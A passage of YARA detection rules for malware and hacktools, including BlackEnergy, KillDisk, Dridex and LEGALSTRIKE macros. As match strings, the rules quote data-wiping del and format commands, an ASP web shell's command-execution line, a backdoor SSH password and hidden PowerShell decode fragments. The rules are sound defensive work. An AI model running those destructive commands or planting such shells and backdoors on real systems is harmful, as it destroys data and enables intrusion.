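   		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
   		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
   		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
   		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
   		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
   		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
   		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
   		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
   		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
   	strings:
   		// anchor that must appear in the first 4000 bytes
   		$a1 = "barcod" fullword ascii

   		// imported/referenced DLL names
   		$s0 = "msports.dll" fullword ascii
   		$s1 = "nddeapi.dll" fullword ascii
   		$s2 = "glmf32.dll" fullword ascii
   		$s4 = "cmutil.dll" fullword ascii
   		$s5 = "mprapi.dll" fullword ascii
   		// manifest requesting elevation
   		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii
   		// ($s6, a second copy of "glmf32.dll", was removed as a duplicate of $s2)
   	condition:
   		uint16(0) == 0x5a4d and filesize < 1500KB
   		and $a1 in (0..4000)
   		and all of ($s*)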
// Hancitor dropper document: an OLE compound file (magic D0 CF 11 E0) whose
// VBA references the three Win32 API names below, each written as a
// NUL-delimited byte sequence (presumably as stored in the VBA project -
// TODO confirm), plus the "POLA" marker.
rule hancitor_dropper : vb_win32api
   {
     meta:
       author = "Jeff White - jwhite@paloaltonetworks @noottrak"
       date   = "18AUG2016"
       hash1  = "03aef51be133425a0e5978ab2529890854ecf1b98a7cf8289c142a62de7acd1a"
       hash2  = "4b3912077ef47515b2b74bc1f39de44ddd683a3a79f45c93777e49245f0e9848"
       hash3  = "a78972ac6dee8c7292ae06783cfa1f918bacfe956595d30a0a8d99858ce94b5a"

     strings:
       $api_01 = { 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }  // VirtualAlloc
       $api_02 = { 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }  // RtlMoveMemory
       // no $api_03 exists; the numbering gap is in the original rule
       $api_04 = { 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }  // CallWindowProcA (bytes decode without a trailing "i")
       $magic  = { 50 4F 4C 41 }  // POLA

     condition:
       // first four bytes of the OLE compound file header
       uint32be(0) == 0xD0CF11E0 and all of ($api_*) and $magic
// https://otx.alienvault.com/pulse/56bda3614637f25d9365df7c
// Dropbearrun.vbs from the BlackEnergy report: a tiny VBScript that starts
// dropbear.exe (an SSH server) from C:\WINDOWS\TEMP\Dropbear on port 6789.
rule BlackEnergy_VBS_Agent
{
    meta:
        description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
        author      = "Florian Roth"
        reference   = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date        = "2016-01-03"
        hash        = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"

    strings:
        // generic WScript.Shell instantiation (also seen once in goodware)
        $s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii
        // working directory and launch line are the specific part
        $s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
        $s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii

    condition:
        // very small script; two of the three lines suffice
        filesize < 1KB and 2 of them
// KillDisk component of BlackEnergy: a PE under 500 KB carrying the command
// lines it hands to cmd.exe/icacls.exe to wipe, reformat and reboot.
rule BlackEnergy_KillDisk_1
{
    meta:
        description = "Detects KillDisk malware from BlackEnergy"
        author      = "Florian Roth"
        reference   = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date        = "2016-01-03"
        score       = 80
        super_rule  = 1
        hash1       = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
        hash2       = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
        hash3       = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
        hash4       = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"

    strings:
        // executables it launches
        $s0 = "system32\\cmd.exe" fullword ascii
        $s1 = "system32\\icacls.exe" fullword wide
        $s8 = "taskhost.exe" fullword wide        // seen once in goodware
        $s9 = "shutdown.exe" fullword wide        // seen once in goodware
        // destructive command lines (drive letter filled in at runtime)
        $s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
        $s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
        $s7 = "/c format %c: /Y /Q" fullword ascii
        $s4 = "/C /Q /grant " fullword wide
        $s3 = "shutdown /r /t %d" fullword ascii
        // temp file name pattern
        $s5 = "%08X.tmp" fullword ascii

    condition:
        uint16(0) == 0x5A4D and filesize < 500KB and 8 of them
// Backdoored Dropbear SSH server from the BlackEnergy campaign, recognised by
// the hard-coded backdoor password string in the PE.
rule BlackEnergy_BackdoorPass_DropBear_SSH
{
    meta:
        description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
        author      = "Florian Roth"
        reference   = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date        = "2016-01-03"
        hash        = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"

    strings:
        // the backdoor password
        $s1 = "passDs5Bu9Te7" fullword ascii

    condition:
        uint16(0) == 0x5A4D and $s1
// BlackEnergy 2: a PE under 250 KB posing as a "Windows system utility
// service" that references msiexec.exe and ReadProcessMemory.
rule BlackEnergy_BE_2
{
    meta:
        description = "Detects BlackEnergy 2 Malware"
        author      = "Florian Roth"
        reference   = "http://goo.gl/DThzLz"
        date        = "2015/02/19"
        hash        = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"

    strings:
        // service / version-info disguise
        $s0 = "<description> Windows system utility service  </description>" fullword ascii
        $s1 = "WindowsSysUtility - Unicode" fullword wide
        // referenced binary and API names
        $s2 = "msiexec.exe" fullword wide
        $s3 = "WinHelpW" fullword ascii
        $s4 = "ReadProcessMemory" fullword ascii

    condition:
        uint16(0) == 0x5A4D and filesize < 250KB and all of ($s*)
// BlackEnergy kernel driver disguised as a "USB MDM Driver" (PE under 180 KB).
// The two Kd* names are ordinary kernel exports that many drivers reference;
// the version-info string is the specific part.
rule BlackEnergy_Driver_USBMDM
{
    meta:
        description = "Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
        author      = "Florian Roth"
        reference   = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
        date        = "2016-01-04"
        super_rule  = 1
        hash1       = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
        hash2       = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
        hash3       = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
        hash4       = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
        hash5       = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
        hash6       = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
        hash7       = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
        hash8       = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"

    strings:
        $s1 = "USB MDM Driver" fullword wide
        $s2 = "KdDebuggerNotPresent" fullword ascii   // goodware string, occurred 50 times
        $s3 = "KdDebuggerEnabled" fullword ascii      // goodware string, occurred 69 times

    condition:
        uint16(0) == 0x5A4D and filesize < 180KB and all of them
// Windows build of the Dropbear SSH server. Not malicious by itself (score 50);
// flagged because the BlackEnergy actors deployed it to keep access.
rule DropBear_SSH_Server
{
    meta:
        description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
        author      = "Florian Roth"
        reference   = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date        = "2016-01-03"
        score       = 50
        hash        = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"

    strings:
        // banner and error messages from the Dropbear sources
        $s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
        $s2 = "Badly formatted command= authorized_keys option" fullword ascii
        $s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
        // default host key paths
        $s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
        $s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii

    condition:
        uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them
// BlackEnergy kernel driver disguised as an "AMD IDE driver" (PE under 150 KB),
// recognised by its device name prefix and the SessionEnv string.
rule BlackEnergy_Driver_AMDIDE
{
    meta:
        description = "Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c, 97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
        author      = "Florian Roth"
        reference   = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
        date        = "2016-01-04"
        super_rule  = 1
        hash1       = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
        hash2       = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
        hash3       = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
        hash4       = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
        hash5       = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
        hash6       = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
        hash7       = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"

    strings:
        // version-info disguise (note the leading space)
        $s1 = " AMD IDE driver" fullword wide
        $s2 = "SessionEnv" fullword wide
        // device/symlink names share a fixed GUID prefix
        $s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
        $s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide

    condition:
        uint16(0) == 0x5A4D and filesize < 150KB and all of them
// KillDisk component of BlackEnergy (second variant of the signature): temp
// file name patterns plus the list of extensions it targets.
rule BlackEnergy_KillDisk_2
{
    meta:
        description = "Detects KillDisk malware from BlackEnergy"
        author      = "Florian Roth"
        reference   = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
        date        = "2016-01-03"
        score       = 80
        super_rule  = 1
        hash1       = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
        hash2       = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
        hash3       = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"

    strings:
        // targeted file extensions, as one concatenated list
        $s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" fullword wide
        // temp file name formats
        $s0 = "%c:\\~tmp%08X.tmp" fullword ascii
        $s1 = "%s%08X.tmp" fullword ascii
        $s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide

    condition:
        uint16(0) == 0x5A4D and filesize < 500KB and 3 of them
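// VBA macro that carries a PE file as a comma-separated decimal byte array
// (the BlackEnergy XLS dropper technique). Meant for decompressed macro code.
//
// Fix: the meta section declared "reference" twice. Tools that expose meta as
// a key/value map (e.g. yara-python) keep only one of them, so the second URL
// now uses "reference2", the key this file already uses in
// CN_Toolset_LScanPortss_2.
rule Contains_hidden_PE_File_inside_a_sequence_of_numbers : maldoc
   {
   	meta:
   		author = "Martin Willing (https://evild3ad.com)"
   		description = "Detect a hidden PE file inside a sequence of numbers (comma separated)"
   		reference = "http://blog.didierstevens.com/2016/01/07/blackenergy-xls-dropper/"
   		reference2 = "http://www.welivesecurity.com/2016/01/04/blackenergy-trojan-strikes-again-attacks-ukrainian-electric-power-industry/"
   		date = "2016-01-09"
   		filetype = "decompressed VBA macro code"

   	strings:
   		$a = "= Array(" // Array of bytes
   		$b = "77, 90," // MZ
   		// decimal encoding of the DOS stub text that follows the PE header
   		$c = "33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46," // !This program cannot be run in DOS mode.

   	condition:
   		all of them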
// https://otx.alienvault.com/pulse/58ecc39479f8bf6099c0ef32
// Dridex delivered as a Word XML document: a macro-bearing Word 2003 XML file
// with an embedded binary and essentially no text content.
rule Dridex_Trojan_XML : maldoc {
    meta:
        description = "Dridex Malware in XML Document"
        author      = "Florian Roth @4nc4p"
        reference   = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
        date        = "2015/03/08"
        hash1       = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
        hash2       = "3b2d59adadf5ff10829bb5c27961b22611676395"
        hash3       = "e528671b1b32b3fa2134a088bfab1ba46b468514"
        hash4       = "981369cd53c022b434ee6d380aa9884459b63350"
        hash5       = "96e1e7383457293a9b8f2c75270b58da0e630bea"
    strings:
        // no ascii/wide modifier on purpose: the document may be either encoding
        // document framing
        $c_xml      = "<?xml version="
        $c_word     = "<?mso-application progid=\"Word.Document\"?>"
        // macro and embedded binary
        $c_macro    = "w:macrosPresent=\"yes\""
        $c_binary   = "<w:binData w:name="
        // document statistics of an (almost) empty body
        $c_0_chars  = "<o:Characters>0</o:Characters>"
        $c_1_line   = "<o:Lines>1</o:Lines>"
    condition:
        all of ($c*)
// Phishing wave of 2015-12-02: the XLS attachment (OLE compound file under
// 200 KB) whose macro shells out via WScript.Shell.
rule PHISH_02Dez2015_attach_P_ORD_C_10156_124658 {
    meta:
        description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
        author      = "Florian Roth"
        reference   = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
        date        = "2015-12-02"
        hash        = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
    strings:
        // macro routine names
        $s2 = "Process WriteParameterFiles" fullword ascii
        $s5 = "InsertEmailFax" ascii
        $s4 = "STOCKMASTER" fullword ascii
        // execution primitives
        $s3 = "WScript.Shell" fullword ascii
        $s1 = "Execute" ascii
    condition:
        // 0xcfd0 is the little-endian read of the OLE header bytes D0 CF
        uint16(0) == 0xCFD0 and filesize < 200KB and all of them
// Phishing wave of 2015-12-02: the dropped executable p0o6543f.exe (PE under
// 250 KB). Most strings are common in goodware; the rule requires all nine.
rule PHISH_02Dez2015_dropped_p0o6543f {
    meta:
        description = "Phishing Wave - file p0o6543f.exe"
        author      = "Florian Roth"
        reference   = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
        date        = "2015-12-02"
        hash        = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"
    strings:
        // specific: tools it names
        $s1 = "netsh.exe" fullword wide
        $s2 = "routemon.exe" fullword wide
        // generic (goodware occurrence counts from the original signature)
        $s3 = "script=" fullword wide                    // 4
        $s4 = "disconnect" fullword wide                 // 14
        $s5 = "GetClusterResourceTypeKey" fullword ascii // 17
        $s6 = "QueryInformationJobObject" fullword ascii // 34
        $s7 = "interface" fullword wide                  // 52
        $s8 = "connect" fullword wide                    // 61
        $s9 = "FreeConsole" fullword ascii               // 91
    condition:
        uint16(0) == 0x5A4D and filesize < 250KB and all of them
// https://otx.alienvault.com/pulse/5589f402b45ff578e825e6f2
// Excel/Word OLE document used in a targeted attack: compound file header at
// offset 0 plus scripting/Base64/file-deletion markers (JSRat).
rule APT_OLE_JSRat : maldoc APT
{
    meta:
        author      = "Rahul Mohandas"
        Date        = "2015-06-16"
        Description = "Targeted attack using Excel/word documents"
    strings:
        // OLE compound file header
        $header = { D0 CF 11 E0 A1 B1 1A E1 }
        // script markers
        $key4 = "Scripting.FileSystemObject" nocase
        $key3 = "DeleteFile" nocase
        $key2 = "Base64Str" nocase
        // run of padding characters
        $key1 = "AAAAAAAAAA"
    condition:
        $header at 0 and all of ($key*)
// https://otx.alienvault.com/pulse/5937358f2ea86b08b86e5063
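// Office macro with the ChrW()-chain obfuscation seen in sample
// 30f149479c02b741e897cdb9ecd22da7 (FireEye LEGALSTRIKE). $ob1..$ob8 are
// consecutive ten-element pieces of the obfuscated command line; $obreg1 and
// $obreg2 describe the same "X & X & ..." chaining generically.
//
// Fix: $obreg2 was written as /(Chrw\(.../ while VBA spells the function
// "ChrW" and every literal fragment above uses that spelling. YARA regexes are
// case-sensitive by default, so the "all of ($obreg*)" branch could only fire
// on a lowercase-w variant the sample itself does not contain. VBA identifiers
// are case-insensitive, so the regex now matches nocase.
rule FE_LEGALSTRIKE_MACRO {
    meta:
        version     = ".1"
        filetype    = "MACRO"
        author      = "Ian.Ahl@fireeye.com @TekDefense"
        date        = "2017-06-02"
        description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
    strings:
        // OBSFUCATION - literal ChrW() chains from the sample
        $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
        $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
        $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
        $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
        $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
        $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
        $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
        $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
        // generic chaining: eight 5-char tokens joined by " & ", and seven
        // ChrW(n) calls joined the same way (case-insensitive, see above)
        $obreg1 = /(\w{5}\s&\s){7}\w{5}/
        $obreg2 = /(ChrW\(\d{1,3}\)\s&\s){7}/ nocase
        // wscript - object creation and the Run call
        $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
        $wsobj2 = "Obj.Run " ascii wide

    condition:
        // not a PE, both WScript strings, and either three literal fragments
        // or both generic patterns. Note the $ob* wildcard also covers
        // $obreg1/$obreg2, so those count toward "3 of ($ob*)".
        uint16(0) != 0x5A4D
        and (
            (all of ($wsobj*) and 3 of ($ob*))
            or
            (all of ($wsobj*) and all of ($obreg*))
        )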
// RTF lure from the LEGALSTRIKE campaign (CVE-2017-0199, OLE2Link pointing at
// 2bunny[.]com). Object data in RTF is hex, so the markers are hex digit
// strings; the URL and domain bytes appear one hex pair at a time, each
// followed by a "{" / "{\" group that breaks up the plain hex (presumably an
// evasion - TODO confirm against the sample).
rule FE_LEGALSTRIKE_RTF {
       meta:
           version=".1"
           // NOTE(review): "MACRO" is copied from the sibling macro rules; this
           // rule matches RTF, so the value looks inherited rather than intended
           filetype="MACRO"
           author="joshua.kim@FireEye.com"
           date="2017-06-02"
           description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"

       strings:
           // RTF header (also covers malformed {\rtX variants)
           $header = "{\\rt"

           // UTF-16LE "LinkInfo"
           $lnkinfo = "4c0069006e006b0049006e0066006f"

           // ascii "OLE2Link"; UTF-16LE "Root Entry", "ObjInfo", "Ole"
           $encoded1 = "4f4c45324c696e6b"
           $encoded2 = "52006f006f007400200045006e007400720079"
           $encoded3 = "4f0062006a0049006e0066006f"
           $encoded4 = "4f006c0065"

           // 'h', 't' as hex pairs followed by a group; "07" is not 'p' (0x70),
           // so either the sample really contains it or it is a transposition -
           // TODO confirm before changing
           $http1 = "68{"
           $http2 = "74{"
           $http3 = "07{"

           // 2bunny.com, one hex pair per string: 2 b u n n y . c o m
           $domain1 = "32{\\"
           $domain2 = "62{\\"
           $domain3 = "75{\\"
           $domain4 = "6e{\\"
           $domain5 = "79{\\"
           $domain6 = "2e{\\"
           $domain7 = "63{\\"
           $domain8 = "6f{\\"
           $domain9 = "6d{\\"

           // RTF \*\datastore destination that holds the object
           $datastore = "\\*\\datastore"

       condition:
           // every marker must be present, with the RTF header at offset 0
           $header at 0 and all of them
// Office macro (sample 3a1dca21bfe72368f2dd46eb4d9b48c4) that reads the
// architecture/windir environment, builds the path of the 32-bit PowerShell
// binary and runs a hidden, non-interactive command that inflates a
// Base64-encoded DeflateStream payload.
rule FE_LEGALSTRIKE_MACRO_2 {
          meta:version=".1"
          filetype="MACRO"
          author="Ian.Ahl@fireeye.com @TekDefense"
          date="2017-06-02"
          description="This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4."
   strings:
          // Setting the environment
          $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
          $env2 = "windir = Environ(\"windir\")" ascii wide
          $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
          // powershell command fragments: switches, then the decode/inflate chain
          $ps1 = "-NoP" ascii wide
          $ps2 = "-NonI" ascii wide
          $ps3 = "-W Hidden" ascii wide
          $ps4 = "-Command" ascii wide
          $ps5 = "New-Object IO.StreamReader" ascii wide
          $ps6 = "IO.Compression.DeflateStream" ascii wide
          $ps7 = "IO.MemoryStream" ascii wide
          $ps8 = ",$([Convert]::FromBase64String" ascii wide
          $ps9 = "ReadToEnd();" ascii wide
          // generic: a word, whitespace, then a double-quoted argument.
          // Its identifier starts with "$ps", so the $ps* wildcard in the
          // condition counts it as one of the "6 of ($ps*)" too.
          $psregex1 = /\W\w+\s+\s\".+\"/
   condition:
          // not a PE, all three environment lines, and either six fragments
          // or four fragments plus the regex
          (
                 (
                         (uint16(0) != 0x5A4D)
                 )
                 and
                 (
                         all of ($env*) and 6 of ($ps*)
                         or
                         all of ($env*) and 4 of ($ps*) and all of ($psregex*)
                 )
          )
// https://otx.alienvault.com/pulse/5977c9ed0972115990362a3b
// ASP web shell aspfile1.asp from a disclosed (old) hacktool set: takes a
// command from the ".CMD" form field and runs it through cmd.exe.
rule aspfile1 {
    meta:
        description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
        author      = "Florian Roth"
        date        = "23.11.14"
        score       = 60
        hash        = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
    strings:
        // input form and parameter read
        $s6  = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
        $s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
        $s0  = "' -- check for a command that we have posted -- '" fullword ascii
        // execution and output capture
        $s1  = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
        $s8  = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
        // page header (gb2312 charset)
        $s5  = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
    condition:
        3 of them
// Ammyy Admin remote administration tool (AA_v3.4 / AA_v3.5), abused by the
// Anunak group. $x* are build paths and UI strings specific to the tool.
rule Ammyy_Admin_AA_v3 {
    meta:
        description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
        author      = "Florian Roth"
        reference   = "http://goo.gl/gkAg2E"
        date        = "2014/12/22"
        score       = 55
        hash1       = "b130611c92788337c4f6bb9e9454ff06eb409166"
        hash2       = "07539abb2623fe24b9a05e240f675fa2d15268cb"
    strings:
        // source paths left in the binary
        $x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
        $x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
        $x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
        // named object and prompt
        $x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
        $x5 = "Please enter password for accessing remote computer" fullword ascii

        // error messages (less specific; all four required)
        $s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
        $s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
        $s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
        $s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
    condition:
        2 of ($x*) or all of ($s*)
// Auto-generated (yarGen) signature for Stealth.exe: an HTML table fragment
// and the tool's disclaimer text, both required.
rule stealth_Stealth {
    meta:
        description = "Auto-generated rule on file Stealth.exe"
        author      = "yarGen Yara Rule Generator by Florian Roth"
        hash        = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
    strings:
        $s6 = "This tool may be used only by system administrators. I am not responsible for "
        $s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
    condition:
        all of them
// DUBrute.exe from a Chinese hacktool set: a brute-forcer recognised by its
// IP/login/password progress messages (PE under 1020 KB).
rule DUBrute_DUBrute {
    meta:
        description = "Chinese Hacktool Set - file DUBrute.exe"
        author      = "Florian Roth"
        reference   = "http://tools.zjqhr.com/"
        date        = "2015-06-13"
        hash        = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"
    strings:
        // status line, format string and its all-zero instance
        $s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
        $s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii
        $s3 = "Create %d IP@Loginl;Password" fullword ascii
        // vendor site
        $s4 = "UBrute.com" fullword ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 1020KB and all of them
// LScanPortss.exe port scanner from a disclosed Chinese toolset; any four of
// the product, site and runtime strings match.
rule CN_Toolset_LScanPortss_2 {
    meta:
        description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
        author      = "Florian Roth"
        reference   = "http://qiannao.com/ls/905300366/33834c0c/"
        reference2  = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
        date        = "2015/03/30"
        score       = 70
        hash        = "4631ec57756466072d83d49fbc14105e230631a0"
    strings:
        // product names
        $s1  = "LScanPort.EXE" fullword wide
        $s15 = "LScanPort Microsoft " fullword wide
        $s18 = "L-ScanPort2.0 CooFly" fullword wide
        // web sites
        $s3  = "www.honker8.com" fullword wide
        $s6  = "www.hf110.com" fullword wide
        // config file and completion message
        $s4  = "DefaultPort.lst" fullword ascii
        $s5  = "Scan over.Used %dms!" fullword ascii
    condition:
        4 of them
// pc2015.exe from a Chinese hacktool set (PE under 309 KB): svchost path,
// an obfuscated string and a numbered-file format.
rule Pc_pc2015 {
    meta:
        description = "Chinese Hacktool Set - file pc2015.exe"
        author      = "Florian Roth"
        reference   = "http://tools.zjqhr.com/"
        date        = "2015-06-13"
        hash        = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
    strings:
        $s0 = "\\svchost.exe" fullword ascii
        // looks encoded/obfuscated - meaning not known from the rule itself
        $s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii
        $s8 = "%s%08x.001" fullword ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 309KB and all of them
// Auto-generated (yarGen) signature for "StealthWasp's Basic PortScanner
// v1.2.exe": product name plus its scanning status text.
rule StealthWasp_s_Basic_PortScanner_v1_2 {
    meta:
        description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
        author      = "yarGen Yara Rule Generator by Florian Roth"
        hash        = "7c0f2cab134534cd35964fe4c6a1ff00"
    strings:
        $s6 = "Now scanning port:"
